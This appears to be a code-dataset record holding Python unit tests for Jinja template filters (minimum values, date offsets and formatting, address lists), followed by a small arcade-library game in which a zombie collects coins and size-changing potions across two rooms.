self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
            ('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday input returns the previous Sunday (taken from the last whole week)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
            ('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous Sunday with +1 week offset, back to the input date
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
def test_format_date_custom(self):
test_cases = [
            # Input Date, date format, expected output
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, *case[0:2]),
"<span class='date'>{}</span>".format(case[2])
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3]),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(case[3], case[4])
)
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['<NAME>', '<NAME>', '<NAME>']),
([['John', 'Smith']], ['<NAME>']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['<NAME>', '<NAME>', '<NAME>']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', '<NAME>']),
([['John', 'Smith'], [[], []]], ['<NAME>'])
]
for case in test_cases:
format_repeating_summary(None, case[0])
# Format unordered list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in case[1]]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_None_value(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0]) | en | 0.494334 | # coding: utf-8 # pylint: disable=too-many-public-methods # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given no test for integers this check was removed from jinja_filters # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # (Input Date, offset, day of week, expected output) # Friday outputs previous Sunday # Sunday outputs previous Sunday (Must be a full Sunday) # Monday outputs previous Sunday # Previous sunday with -1 day offset # Previous sunday with +1 month offset, back to input # Friday outputs previous Friday # Ensure we can handle datetime input # Friday outputs previous Friday + 4 weeks # Friday outputs previous Friday + nothing # Friday outputs previous Friday + 1 year # Friday outputs previous Friday + 1 year + 1 week + 1 day # pylint: disable=unnecessary-lambda # Input Date, date format, show year # Start Date, End Date, Date Format, Output Expected First, Output Expected Second # pylint: disable=no-self-use # (input list, expected output) # Format unordered list takes a list of lists | 2.368902 | 2 |
levels/sombie.py | superhasduper/PythonGames | 1 | 8037 | import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
class Room:
"""
This class holds all the information about the
different rooms.
"""
def __init__(self):
# You may want many lists. Lists for coins, monsters, etc.
self.wall_list = None
self.coin_list = None
self.door_list = None
self.smallpotion_list = None
self.bigpotion_list = None
# This holds the background images. If you don't want changing
# background images, you can delete this part.
self.background = None
self.score = 0
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
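    # Place a row of four coins along y=500 in room 1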
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
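    # Shrink potion for room 1; colliding with it scales the player down in update()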
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
    # This y loop covers two values: 0 and just under the top of the window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
    wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
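    # Grow potion for room 2; colliding with it restores the player's full size in update()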
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self, width, height):
"""
Initializer
"""
super().__init__(width, height,"Tocate el pnnywise")
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
# Sprite lists
self.current_room = 0
# Set up the player
self.game_over = False
self.door_list = None
self.rooms = None
self.score = 0
self.coin_list = None
self.player_sprite = None
self.physics_engine = None
self.smallpotion_list = None
self.bigpotion_list = None
def setup(self):
""" Set up the game and initialize the variables. """
# Set up the player
self.player_sprite = arcade.AnimatedWalkingSprite()
self.score = 0
self.coin_list = arcade.SpriteList()
self.smallpotion_list = arcade.SpriteList()
self.bigpotion_list = arcade.SpriteList()
self.player_sprite.center_x = 100
self.player_sprite.center_y = 150
character_scale = 0.75
self.player_sprite.stand_right_textures = []
self.player_sprite.stand_right_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale))
self.player_sprite.stand_left_textures = []
self.player_sprite.stand_left_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_right_textures = []
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale))
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale))
self.player_sprite.walk_left_textures = []
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale, mirrored=True))
# Our list of rooms
self.rooms = []
# Create the rooms. Extend the pattern for each room.
room = setup_room_1()
self.rooms.append(room)
room = setup_room_2()
self.rooms.append(room)
# Our starting room number
self.current_room = 0
# Create a physics engine for this room
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].wall_list)
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].door_list)
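        # Only this last engine is kept, so collisions are checked against the door list until the room changes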
def on_draw(self):
"""
Render the screen.
"""
# This command has to happen before we start drawing
arcade.start_render()
# Draw the background texture
arcade.draw_texture_rectangle(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2,
SCREEN_WIDTH, SCREEN_HEIGHT, self.rooms[self.current_room].background)
# Draw all the walls in this room
self.rooms[self.current_room].door_list.draw()
self.rooms[self.current_room].wall_list.draw()
self.rooms[self.current_room].coin_list.draw()
self.rooms[self.current_room].bigpotion_list.draw()
self.rooms[self.current_room].smallpotion_list.draw()
# If you have coins or monsters, then copy and modify the line
# above for each list.
output = "Score: {}".format(self.score)
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
self.player_sprite.draw()
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.W:
self.player_sprite.change_y = MOVEMENT_SPEED
elif key == arcade.key.S:
self.player_sprite.change_y = -MOVEMENT_SPEED
elif key == arcade.key.A:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.D:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.W or key == arcade.key.S:
self.player_sprite.change_y = 0
elif key == arcade.key.A or key == arcade.key.D:
self.player_sprite.change_x = 0
def update(self, delta_time):
""" Movement and game logic """
self.player_sprite.update_animation()
# Call update on all sprites (The sprites don't do much in this
# example though.)
self.physics_engine.update()
# Do some logic here to figure out what room we are in, and if we need to go
# to a different room.
if self.player_sprite.center_x > SCREEN_WIDTH and self.current_room == 0:
self.current_room = 1
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = 0
elif self.player_sprite.center_x < 0 and self.current_room == 1:
self.current_room = 0
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = SCREEN_WIDTH
hit_list = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].coin_list)
hit_list2 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].bigpotion_list)
hit_list3 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].smallpotion_list)
for coin in hit_list:
coin.kill()
self.score += 1
my_sound = arcade.load_sound("coinsound.wav")
arcade.play_sound(my_sound)
if self.score == 4:
for i in self.rooms[self.current_room].door_list:
i.kill()
your_sound = arcade.load_sound("door.wav")
arcade.play_sound(your_sound)
for smallpotion in hit_list3:
smallpotion.kill()
self.player_sprite.scale=0.5
tu_sound = arcade.load_sound("shrink.wav")
arcade.play_sound(tu_sound)
for bigpotion in hit_list2:
bigpotion.kill()
self.player_sprite.scale=1
yo_sound = arcade.load_sound("grow.wav")
arcade.play_sound(yo_sound)
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main() | import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
class Room:
"""
This class holds all the information about the
different rooms.
"""
def __init__(self):
# You may want many lists. Lists for coins, monsters, etc.
self.wall_list = None
self.coin_list = None
self.door_list = None
self.smallpotion_list = None
self.bigpotion_list = None
# This holds the background images. If you don't want changing
# background images, you can delete this part.
self.background = None
self.score = 0
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
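# Extension sketch (hypothetical, mirrors setup_room_1): a third room would follow the
# same pattern -- create the sprite lists on_draw() expects, add walls/coins, set a
# background, return the Room, then append it to self.rooms in MyGame.setup().
# def setup_room_3():
#     room = Room()
#     room.wall_list = arcade.SpriteList()
#     room.door_list = arcade.SpriteList()
#     room.coin_list = arcade.SpriteList()
#     room.smallpotion_list = arcade.SpriteList()
#     room.bigpotion_list = arcade.SpriteList()
#     room.background = arcade.load_texture("g.png")
#     return room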
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
# This y loops a list of two, the coordinate 0, and just under the top of window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
